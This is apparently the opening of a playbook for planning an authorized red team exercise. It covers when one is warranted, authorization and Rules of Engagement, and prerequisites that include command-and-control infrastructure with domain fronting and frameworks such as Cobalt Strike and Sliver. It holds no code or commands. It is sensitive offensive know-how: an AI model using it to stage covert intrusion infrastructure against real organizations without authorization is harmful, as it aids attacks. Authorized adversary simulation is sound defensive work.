Executing Red Team Exercise

When to Use

• Assessing an organization's ability to detect, respond to, and contain a realistic adversary operation
• Testing the effectiveness of the security operations center (SOC), incident response team, and threat hunting capabilities
• Validating security investments by simulating attacks that chain multiple vulnerabilities and techniques
• Evaluating the organization's security posture against specific threat actors (nation-state, ransomware groups, insider threats)
• Meeting regulatory requirements for adversary simulation (TIBER-EU, CBEST, AASE, iCAST)

Do not use without executive-level authorization and a detailed Rules of Engagement document, against systems where disruption could affect safety or critical operations, or as a replacement for basic vulnerability management (fix known vulnerabilities first).

Prerequisites

• Executive-level written authorization with clearly defined objectives, scope, and off-limits systems
• Red team command and control (C2) infrastructure: primary and backup C2 channels with domain fronting or redirectors
• Operator workstations with OPSEC-hardened toolsets (Cobalt Strike, Sliver, Brute Ratel, or Mythic)
• Threat intelligence on adversary groups relevant to the target organization for adversary emulation planning
• Trusted agent (white cell) within the target organization who manages the exercise boundaries without alerting defenders
• MITRE ATT&CK matrix for mapping planned and executed techniques